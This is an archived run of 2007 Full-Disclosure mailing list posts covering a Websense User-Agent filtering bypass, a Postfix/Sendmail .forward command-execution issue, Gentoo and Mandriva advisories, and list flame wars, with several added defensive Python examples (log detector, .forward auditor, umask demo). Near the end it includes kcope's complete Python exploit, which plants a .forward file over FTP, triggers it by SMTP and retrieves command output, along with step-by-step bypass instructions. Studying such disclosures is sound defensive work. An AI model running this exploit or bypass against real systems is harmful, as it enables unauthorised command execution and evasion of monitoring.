 Sent: Wednesday, December 12, 2007 3:32 PM
 To: [EMAIL PROTECTED]; Full-Disclosure
 Subject: [Full-disclosure] Fwd: Websense 6.3.1 Filtering Bypass

 Mr. HinkyDink would like to share the following with the Security
 Community...

 -- Forwarded message --
 From:  [EMAIL PROTECTED]
 Date: Dec 12, 2007 6:05 PM
 Subject: Websense 6.3.1 Filtering Bypass
 To: [EMAIL PROTECTED]



 Please share this with your little friends...

 --

 Websense Policy Filtering Bypass
 
 discovered by mrhinkydink


 PRODUCT: Websense Enterprise 6.3.1

 EXPOSURE: Web Filtering Bypass

 SYNOPSIS
 

 By spoofing the User-Agent header it is possible to bypass filtering and,
 to a lesser extent, monitoring in a Websense Enterprise 6.3.1 environment.

 PROOF OF CONCEPT
 

 The following was tested in an unpatched 6.3.1 system using the ISA Server
 integration product.  It is assumed it will work with other integration
 products but this has not been tested.  Other User Agents may also work.

 I.  Install FireFox 2.0.x

 II. Obtain and install the User Agent Switcher browser plug-in by Chris Pederick

 III. Add the following User Agents to the plug-in

 Description: RealPlayer
 User Agent : RealPlayer G2

 Description: MSN Messenger
 User Agent : MSMSGS

 Description: WebEx
 User Agent : StoneHttpAgent

 IV.  Change FireFox's User Agent to any one of the preceding values

 V.   Browse to a filtered Web site

 VI.  Content is allowed

 Content browsed via this method will be recorded in the Websense database
 as being in the Non-HTTP category.

 Demonstration: http://www.youtube.com/watch?v=pKv41ge8XcQ

 SEE ALSO
 
 Websense KnowledgeBase article #976

 The vendor acknowledges this behavior in the aforementioned article.

 WORKAROUND
 ==
 Disable the protocols mentioned above.

 VENDOR RESPONSE
 ===
 Websense has repaired this issue in database #92938

 NOTICE
 ==
 mrhinkydink is not to be confused with the blogger by the same name
 at www.dailykos.com

 c. MMVII mrhinkydink

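The bypass works because requests carrying these User-Agent strings are classified as Non-HTTP and waved through, but the advisory also notes that the traffic is still recorded, in the Non-HTTP category. That record is what a defender can work with. The following is an added example (my own code, not part of the advisory or of any Websense product): it parses constructed proxy log lines in an assumed field layout (client IP, category, response content type, quoted User-Agent, URL; not the real Websense or ISA Server log format) and flags Non-HTTP entries whose User-Agent is one of the protocol clients named above but whose response was an HTML page, which a real RealPlayer, MSN Messenger or WebEx client would not be fetching.

```python
import re
from collections import Counter

# User-Agent strings the advisory above reports as bypassing the filter;
# Websense logged such traffic in the "Non-HTTP" category.
PROTOCOL_CLIENT_AGENTS = {
    "RealPlayer G2": "RealPlayer",
    "MSMSGS": "MSN Messenger",
    "StoneHttpAgent": "WebEx",
}

# Constructed sample log lines (not real Websense or ISA Server output).
# Assumed field layout: client_ip category response_content_type "user_agent" url
SAMPLE_LOG = """\
10.0.0.5 Non-HTTP text/html "MSMSGS" http://social.example/feed
10.0.0.5 Non-HTTP text/html "MSMSGS" http://social.example/photos
10.0.0.7 Non-HTTP application/octet-stream "MSMSGS" http://messenger.example/session
10.0.0.9 Non-HTTP text/html "RealPlayer G2" http://video.example/watch?v=1
10.0.0.11 News text/html "Mozilla/5.0 (Windows; U; Windows NT 5.1) Firefox/2.0.0.11" http://news.example/
10.0.0.13 Non-HTTP audio/x-pn-realaudio "RealPlayer G2" http://radio.example/live.rm
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+)\s+(?P<category>\S+)\s+(?P<ctype>\S+)\s+"(?P<ua>[^"]*)"\s+(?P<url>\S+)$'
)


def parse_line(line):
    """Return a dict of fields for one log line, or None if it does not match the layout."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def is_spoofed_browser(entry):
    """A protocol-client User-Agent that pulled an HTML document is browser
    traffic in disguise: the genuine RealPlayer/MSN/WebEx clients fetch streams
    and session data, not text/html pages."""
    return (
        entry["category"] == "Non-HTTP"
        and entry["ua"] in PROTOCOL_CLIENT_AGENTS
        and entry["ctype"].split(";")[0].strip().lower() == "text/html"
    )


def find_spoofed(log_text):
    """Return (client_ip, claimed_client, url) for every suspicious line."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry and is_spoofed_browser(entry):
            hits.append((entry["ip"], PROTOCOL_CLIENT_AGENTS[entry["ua"]], entry["url"]))
    return hits


def clients_by_hit_count(log_text):
    """Aggregate hits per client so the noisiest workstations surface first."""
    return Counter(ip for ip, _, _ in find_spoofed(log_text))


if __name__ == "__main__":
    for ip, client, url in find_spoofed(SAMPLE_LOG):
        print("%s claimed to be %s but fetched an HTML page from %s" % (ip, client, url))
    print(clients_by_hit_count(SAMPLE_LOG).most_common())
```

The content-type test is what separates the legitimate MSN session and the RealAudio stream in the sample from the disguised browsing; tying the check to the Non-HTTP category keeps it from firing on ordinary, correctly categorised web traffic. Until the vendor's signature fix is in place, the same rule can be fed to whatever reporting the proxy offers, and the per-client count points at the workstation to look at.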

Re: [Full-disclosure] on xss and its technical merit

2007-12-13 Thread Fredrick Diggle
WRONG! Once again, xss is not the exploit, it is just the delivery mechanism.
You aren't doing anything here that you couldn't also do by posting the
exploit on your damn live journal right next to the paris hilton video.

Did you end up paying damages?

YAY!

On Dec 13, 2007 11:46 AM, Morning Wood [EMAIL PROTECTED] wrote:

 4. use xss to IFRAME or otherwise leverage a client exploit

 imho this is by far worse than any of the other vectors mentioned


[Full-disclosure] Small Design Bug in Postfix - REMOTE

2007-12-13 Thread kcope
Small Design Bug in Postfix - REMOTE

There's a small issue on how Postfix forwards mails.
A user can have a .forward file in her home directory.
Inside this file she can specify an alternative recipient
or use aliasing to execute commands when mail is received.
From the manpage ALIASES(5)
aliases - Postfix local alias database format

|command
  Mail is piped into command. Commands  that  contain
  special  characters,  such as whitespace, should be
  enclosed between double quotes.  See  local(8)  for
  details of delivery to command.

  When the command fails, a limited amount of command
  output is mailed back  to  the  sender.   The  file
  /usr/include/sysexits.h  defines  the expected exit
  status codes. For example, use |exit 67 to  simu-
  late  a  user  unknown  error,  and  |exit 0 to
  implement an expensive black hole.

This is fine since Postfix properly drops privileges before
executing the command.
The problem with executing commands via .forward files is that
if someone manages to place a file into one's home directory and
just sends a file to the mailserver, she can execute commands
even when she's not supposed to or does not have the privileges.

Here is an example exploitation session; the user 'rootkey'
only has FTP access with write permissions and no other privileges than that.

Login to FTP server
telnet box 21
USER rootkey
PASS rootkey123
logged in

Put .forward file with following contents into the home directory of
user 'rootkey'.

---snip---
|touch /tmp/XXX
---snip---

put .forward

Now send an email to user rootkey.

telnet box 25
mail from: rootkey
rcpt to: rootkey
data
.

RESULT:

[EMAIL PROTECTED]:~$ ls /tmp/testXXX
/tmp/testXXX


signed,

- -kcope/2007

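Whether a .forward dropped in by someone other than the account owner is honoured depends on local setup (FTP write access in the post above, group- or world-writable home directories elsewhere), so the useful defender-side check is an inventory: which accounts have command delivery configured, and could anyone but the owner have put it there. The following is an added example, not code from the post or from Postfix. It implements a small parser for the aliases(5)-style entry syntax the quoted manpage describes (|command, /file, :include:/file, or an address; entries separated by commas or newlines; double quotes protecting special characters) and runs an audit over a constructed inventory of hypothetical users, home-directory modes and .forward owners.

```python
import stat

INCLUDE_PREFIX = ":include:"


def split_entries(text):
    """Split .forward contents into raw entries following aliases(5) conventions:
    commas or newlines separate entries unless inside double quotes, and lines
    starting with '#' are comments."""
    entries, buf, quoted = [], [], False
    for line in text.splitlines():
        if not quoted and line.lstrip().startswith("#"):
            continue
        for ch in line:
            if ch == '"':
                quoted = not quoted
            elif ch == "," and not quoted:
                entries.append("".join(buf))
                buf = []
                continue
            buf.append(ch)
        if quoted:
            buf.append("\n")          # a quoted entry continues on the next line
        else:
            entries.append("".join(buf))
            buf = []
    entries.append("".join(buf))
    return [e.strip() for e in entries if e.strip()]


def strip_quotes(s):
    return s[1:-1].strip() if len(s) >= 2 and s[0] == '"' and s[-1] == '"' else s


def classify(entry):
    """Return (kind, target); kind is one of pipe, file, include, address."""
    e = strip_quotes(entry.strip())                     # "|cmd with spaces" form
    if e.startswith("|"):
        return ("pipe", strip_quotes(e[1:].strip()))    # also the |"cmd" form
    if e.startswith(INCLUDE_PREFIX):
        return ("include", e[len(INCLUDE_PREFIX):].strip())
    if e.startswith("/"):
        return ("file", e)
    return ("address", e)


def parse_forward(text):
    return [classify(e) for e in split_entries(text)]


def writable_by_others(mode):
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_forward(user, forward_text, home_mode, forward_owner):
    """Report command, file and include delivery configured in one user's .forward.
    Severity is raised when someone other than the user could have planted the
    file: a home directory writable by group or others, or a .forward that the
    account does not own (the post above relies on exactly that kind of access)."""
    exposed = writable_by_others(home_mode) or forward_owner != user
    findings = []
    for kind, target in parse_forward(forward_text):
        if kind == "pipe":
            findings.append((user, kind, target, "high" if exposed else "medium"))
        elif kind in ("file", "include") and exposed:
            findings.append((user, kind, target, "medium"))
    return findings


# Constructed inventory (hypothetical users, not real hosts): home directory
# permission bits, owner of the .forward file, and the file's contents.
SAMPLE_INVENTORY = [
    ("rootkey", 0o755, "rootkey", "|touch /tmp/XXX\n"),
    ("alice",   0o700, "alice",   "alice@mail.example\n"),
    ("bob",     0o777, "bob",     '"|/usr/bin/procmail -f-", bob@mail.example\n'),
    ("carol",   0o700, "ftpuser", "# archive a copy\n/home/carol/mail/archive, carol@mail.example\n"),
]


def audit_inventory(inventory):
    findings = []
    for user, home_mode, owner, text in inventory:
        findings.extend(audit_forward(user, text, home_mode, owner))
    return findings


if __name__ == "__main__":
    for user, kind, target, severity in audit_inventory(SAMPLE_INVENTORY):
        print("%-6s %-7s %-8s %s" % (severity, kind, user, target))
```

On a real host the inventory would come from walking the home directories and stat()ing each .forward; the parser and the severity rule stay the same. On the Postfix side, the local(8) parameter allow_mail_to_commands (default "alias, forward") set to just "alias" makes Postfix refuse command delivery from .forward files altogether, which removes the vector rather than merely detecting it.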


[Full-disclosure] [ GLSA 200712-11 ] Portage: Information disclosure

2007-12-13 Thread Pierre-Yves Rofes
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200712-11
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: Portage: Information disclosure
  Date: December 13, 2007
  Bugs: #193589
ID: 200712-11

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


Portage may disclose sensitive information when updating configuration
files.

Background
==

Portage is the default Gentoo package management system.

Affected packages
=

    -------------------------------------------------------------------
     Package   /  Vulnerable  / Unaffected
    -------------------------------------------------------------------
      1  sys-apps/portage  < 2.1.3.11  >= 2.1.3.11

Description
===

Mike Frysinger reported that the etc-update utility uses temporary
files with the standard umask, which results in the files being
world-readable when merging configuration files in a default setup.

Impact
==

A local attacker could access sensitive information when configuration
files are being merged.

Workaround
==

There is no known workaround at this time.

Resolution
==

All Portage users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=sys-apps/portage-2.1.3.11"

References
==

  [ 1 ] CVE-2007-6249
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6249

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200712-11.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHYZJzuhJ+ozIKI5gRApNZAJ4lyQH5GodTtPl31edgBjE1Mge9VACfQ+Pt
UkVIFHoUX8JxEYkUg9v4otA=
=mWha
-----END PGP SIGNATURE-----

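The advisory describes a pattern rather than anything specific to etc-update: a tool writes a scratch copy of a sensitive file with the process's default umask, so under the customary 022 the copy is 0644 and any local account can read it for as long as the merge takes. The following is an added example (my own code, not part of Portage or etc-update) that creates a file the leaky way beside the safe way, under a umask the caller chooses, and provides the permission check a reviewer can run against any temporary file path.

```python
import os
import stat
import tempfile

OTHERS_READ = stat.S_IRGRP | stat.S_IROTH


def mode_of(path):
    """Permission bits of a file, e.g. 0o644."""
    return stat.S_IMODE(os.stat(path).st_mode)


def readable_by_others(path):
    """True if any account other than the owner can read the file."""
    return bool(mode_of(path) & OTHERS_READ)


def create_with_umask(directory, name):
    """The leaky pattern: ask for 0666 and let the process umask trim it.
    Under the customary 022 the result is 0644, so a copy of a sensitive
    configuration file made this way is readable by every local user."""
    path = os.path.join(directory, name)
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o666)
    os.close(fd)
    return path


def create_private(directory):
    """The safe pattern: tempfile.mkstemp creates the file 0600 regardless of
    umask, and with O_EXCL, so a pre-placed file cannot be substituted."""
    fd, path = tempfile.mkstemp(prefix="merge-", dir=directory)
    os.close(fd)
    return path


def demo(umask=0o022):
    """Create one file each way under the given umask inside a fresh private
    directory; returns (leaky_path, private_path)."""
    old = os.umask(umask)
    try:
        workdir = tempfile.mkdtemp(prefix="umask-demo-")
        return create_with_umask(workdir, "config.tmp"), create_private(workdir)
    finally:
        os.umask(old)


if __name__ == "__main__":
    leaky, private = demo()
    for p in (leaky, private):
        print("%s mode=%04o readable_by_others=%s" % (p, mode_of(p), readable_by_others(p)))
```

Running demo() with the default 022 shows the 0644 file next to the 0600 one; running it with 077 makes the leaky variant come out 0600 too, which is the "tighten the umask" workaround a tool cannot rely on, because it depends on the caller's environment rather than on the tool itself. Creating the file with an explicit 0600 mode, as mkstemp does, is the fix that holds in every setup.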


Re: [Full-disclosure] Small Design Bug in Postfix - REMOTE

2007-12-13 Thread Fredrick Diggle
You have write perms on a users home directory and this was the best way you
could come up with to execute commands? Please send me details on your
recipe for boiled water. Be sure to gzip it though as I imagine it is
several pages long.

YAY!


Re: [Full-disclosure] Fwd: Websense 6.3.1 Filtering Bypass

2007-12-13 Thread Dude VanWinkle
On Dec 13, 2007 1:45 PM, reepex [EMAIL PROTECTED] wrote:
 automatic updates with notification? Silent patching? Microsoft tactics?

 I also knew websense was a joke but now you have come to this?

What's next? AV companies automatically updating without your
permission? Websense adding new sites to their list of blocked sites
without sending you an email per new site being blocked? AntiMalware
companies doing the same?

Chaos!

-JP



[Full-disclosure] [ GLSA 200712-12 ] IRC Services: Denial of Service

2007-12-13 Thread Pierre-Yves Rofes
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200712-12
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: IRC Services: Denial of Service
  Date: December 13, 2007
  Bugs: #199897
ID: 200712-12

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


A Denial of Service vulnerability has been reported in IRC Services.

Background
==

IRC Services is a system of services to be used with Internet Relay
Chat networks.

Affected packages
=

    -------------------------------------------------------------------
     Package  /  Vulnerable  /  Unaffected
    -------------------------------------------------------------------
      1  net-irc/ircservices   < 5.0.63   >= 5.0.63

Description
===

loverboy reported that the default_encrypt() function in file
encrypt.c does not properly handle overly long passwords.

Impact
==

A remote attacker could provide an overly long password to the
vulnerable server, resulting in a Denial of Service.

Workaround
==

There is no known workaround at this time.

Resolution
==

All IRC Services users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=net-irc/ircservices-5.0.63"

References
==

  [ 1 ] CVE-2007-6122
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6122

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200712-12.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHYZqouhJ+ozIKI5gRAkXqAJ9LYt2SRQXKMWQzU3qqiElskVIWUACfYBlP
JZCdn8HJrEfWKnlXVM4WkmM=
=ANC3
-----END PGP SIGNATURE-----



Re: [Full-disclosure] Small Design Bug in Postfix - REMOTE

2007-12-13 Thread kcope
Look, this also seems to work on sendmail. Not verified though.


[Full-disclosure] [ MDKSA-2007:245 ] - Updated wpa_supplicant package fixes remote denial of service

2007-12-13 Thread security

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2007:245
 http://www.mandriva.com/security/
 ___
 
 Package : wpa_supplicant
 Date: December 13, 2007
 Affected: 2008.0
 ___
 
 Problem Description:
 
 Stack-based buffer overflow in driver_wext.c in wpa_supplicant
 0.6.0 allows remote attackers to cause a denial of service (crash)
 via crafted TSF data.
 
 Updated package fixes this issue.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6025
 ___
 
 Updated Packages:
 
 Mandriva Linux 2008.0:
 80c2dc52d42fb324f6ff90fcfe02b9fa  
2008.0/i586/wpa_gui-0.6.0-1.1mdv2008.0.i586.rpm
 0ec22d8e71719af986748a86ee4063ce  
2008.0/i586/wpa_supplicant-0.6.0-1.1mdv2008.0.i586.rpm 
 18581ca13cf1758016bfaf52a0ea4992  
2008.0/SRPMS/wpa_supplicant-0.6.0-1.1mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 677b536c2f630585c2df72a832aee497  
2008.0/x86_64/wpa_gui-0.6.0-1.1mdv2008.0.x86_64.rpm
 0c87ce95a9432518480ccdc7eed168bb  
2008.0/x86_64/wpa_supplicant-0.6.0-1.1mdv2008.0.x86_64.rpm 
 18581ca13cf1758016bfaf52a0ea4992  
2008.0/SRPMS/wpa_supplicant-0.6.0-1.1mdv2008.0.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (GNU/Linux)

iD8DBQFHYXedmqjQ0CJFipgRAhPNAJsH5R9sOhbryDMXZr2ZidM6EofWewCg2CHm
DI6aimKhL9T+IazFIlxpxkk=
=Ue4m
-----END PGP SIGNATURE-----



Re: [Full-disclosure] gimp sc, and evilness

2007-12-13 Thread Christopher Abad
This is a quite ridiculous series of emails that quickly turned south.
Someone should clear this up.

On Dec 13, 2007 12:48 AM, Kristian Erik Hermansen
[EMAIL PROTECTED] wrote:
 I don't appreciate people spreading false info about me.  If there is
 a problem, I would rather you say it to my face, in person, than
 behind my back.  I don't have a problem with you, but if you are
 blackballing me in the security community, then you and I have
 something to discuss...


 On Dec 12, 2007 12:20 PM, Kristian Erik Hermansen

 [EMAIL PROTECTED] wrote:
  Hi Christopher,
 
  I do not mean to be shady at all.  The point of the exploit was not

I didn't call you shady. I LOLed a shady LOL.

A LOL--A shady one

  original shellcode.  The point was creating a universal exploit for
  Gimp on Windows which would also allow dynamic payload.  If you see,
  the shellcode payload changes based on the user input for the URL.
  Nothing new, but useful for demonstration purposes.  I perhaps should
  have left the second line from the Metasploit output so that
  attribution was taken.  I was not aware that shellcode output from msf
  is intellectual property.  I have given Metasploit plenty of credit
  when I thought necessary.  I even asked H D Moore to borrow some
  images for a talk I did at the Ubuntu Live conference in Oregon this
  year, which he personally allowed...
 
  http://www.kristian-hermansen.com/clonezilla/clonezilla.pdf
 
  I also tried to do MSF a favor for more exposure and get 3.0 into
  Ubuntu's multiverse repository.  However, due to some nuances in the
  MSF License, this was not possible.  I don't see why you think I am so
  evil.  I do not mean to be.  I wish I could have made it to your
  gathering of drinks at 20 GOTO 10 post-baysec, but I was still in
  Boston.  I will try to meet up with you guys at the next baysec, and
  you will see that I am not evil.  Of course, my background in security
  is not as proficient as yours, and I have never been a CEO.  Although,
  I am very familiar with all the companies you have led.  I do,
  however, wonder why you left Cloudmark just after it became
  profitable.  To me, that sounds shady...

Additionally, Cloudmark is a privately held company so either you
guessed that they were profitable or an employee with a loose tongue
unwittingly disclosed that information to you against their employment
contract.



Re: [Full-disclosure] Fwd: Websense 6.3.1 Filtering Bypass

2007-12-13 Thread Hubbard, Dan
It's a patch to the protocol signature database, happens nightly. 

 

 

 

From: reepex [mailto:[EMAIL PROTECTED] 
Sent: Thursday, December 13, 2007 10:46 AM
To: Hubbard, Dan; full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Fwd: Websense 6.3.1 Filtering Bypass

 

automatic updates with notification? Silent patching? Microsoft tactics?


I also knew websense was a joke but now you have come to this?




Re: [Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow Vulnerability

2007-12-13 Thread Morning Wood
basically i am saying i could care less, it was years ago, and i certainly 
do not care about your gay antics at security cons or on this or any other 
public forum...

can you really not be any better than a worthless pile of gmail poop? or at 
least let everyone see your great security worx... but i seriously doubt that 
will happen * kinda like n3td3v's great security research / discoveries!

ciao



Re: [Full-disclosure] Small Design Bug in Postfix - REMOTE

2007-12-13 Thread Just1n T1mberlake
Confirmed Mac OS X is not vulnerable to this.


just1n 


-- 
Surprise - in internet it is everytime!

Mac OS X Evangelist




[Full-disclosure] Sendmail/Postfix FORWARD Remote Exploit

2007-12-13 Thread kcope
exploiting features

(see attached)

- -kcope / 2007

#!python
# (C) 2007 kcope production

from ftplib import FTP
import sys
import socket

print "Sendmail/Postfix FORWARD Remote Exploit"
print "kcope/2007 - hey alex,andi"

if (len(sys.argv) != 4):
    print "usage: skyline.py <hostname> <ftp username> <ftp password>"
    sys.exit()

hostname = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]

print "[+] INITIAL FTP STOR"

def FTPconnect(initial):
    try:
        ftp = FTP(hostname)
        print ftp.getwelcome()
        ftp.login(username, password)
        if (initial):
            f = open(".forward", "wb")
            f.write("|touch /tmp/XXX\n")
            f.close()
        f = open(".forward", "rb")
        ftp.storbinary("STOR .forward", f)
        ftp.quit()
        f.close()
    except:
        print "[-] FTP Error. Correct Login Credentials ?"
        sys.exit()

FTPconnect(True)

print "[+] PLEASE ENTER COMMANDS TO EXECUTE"
print "[+] sendmail allows a single command"
print "[+] postfix allows many"
print "[+] END WITH . IN A SINGLE LINE"

input = sys.stdin.readline().strip()

f = open(".forward", "wb")
f.writelines("|" + "\"" + input + " >> ~/RESULTS" + "\"" + "\n")

while (True):
    input = sys.stdin.readline().strip()
    if (input == "."): break
    f.writelines("|" + "\"" + input + " >> ~/RESULTS" + "\"" + "\n")

f.close()

print "[+] FTP STOR"
FTPconnect(False)

print "[+] EXPLOITING BOX"

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((hostname, 25))
    smtpline = s.recv(1024)
    smtphostname = smtpline[4:smtpline.find(" ", 5)]
    s.close()
except:
    print "[-] EXPLOTATION Error. Is sendmail/postfix running ?"
    sys.exit()

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((hostname, 25))
    smtpline = s.recv(1024)
    print smtpline
    s.send("HELO eyecandy\r\n")
    s.recv(1024)
    s.send("MAIL FROM: " + username + "@" + smtphostname + "\r\n")
    s.recv(1024)
    s.send("RCPT TO: " + username + "@" + smtphostname + "\r\n")
    s.recv(1024)
    s.send("DATA" + "\r\n")
    s.recv(1024)
    s.send("." + "\r\n")
    s.recv(1024)
    s.send("quit" + "\r\n")
    s.recv(1024)
    s.close()
except:
    print "[-] EXPLOTATION Error. Is sendmail/postfix running ?"
    sys.exit()

print "[+] RETRIEVING RESULTS"

try:
    ftp = FTP(hostname)
    print ftp.getwelcome()
    ftp.login(username, password)
    ftp.retrlines("RETR RESULTS")
    ftp.delete("RESULTS")
except:
    print "[-] FTP RETRIEVE Error. Correct Login Credentials ? Sendmail / postfix accepting messages ?"
    sys.exit()

for line in open("RESULTS"):
    print line

f.close()

Re: [Full-disclosure] Small Design Bug in Postfix - REMOTE

2007-12-13 Thread Jim Popovitch
On Thu, 2007-12-13 at 21:18 +0100, kcope wrote:
 Put .forward file with following contents into the home directory of
 user 'rootkey'.

Why not just put /tmp/XXX instead and bypass the extra bit about the
MTA?

-Jim P.




Re: [Full-disclosure] Sendmail/Postfix FORWARD Remote Exploit

2007-12-13 Thread Fredrick Diggle
You should post this to milw0rm as it can always use quality exploit code
like this. I also have some priv8 code which I would like to disclose which
is the same type of vulnerability.

/*
 * Author: Fredrick Diggle
 * Vuln: execve system call allows arbitrary code execution
 * Status: VERY PRIV8
 * DO NOT RELEASE OR FRED DIGGLE WILL EAT YOUR FAMILY
 */
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#define INFINITY 73
#ifdef DIGGLEISAWESOME
int main(int argc, char **argv) {
   if (argc < 2) { fprintf(stderr, "usage: %s [command to run]\n\tPRIV8 Fred Diggle 0day\n", argv[0]); return INFINITY; }
   execve(argv[1], &argv[1], 0);
}
#endif


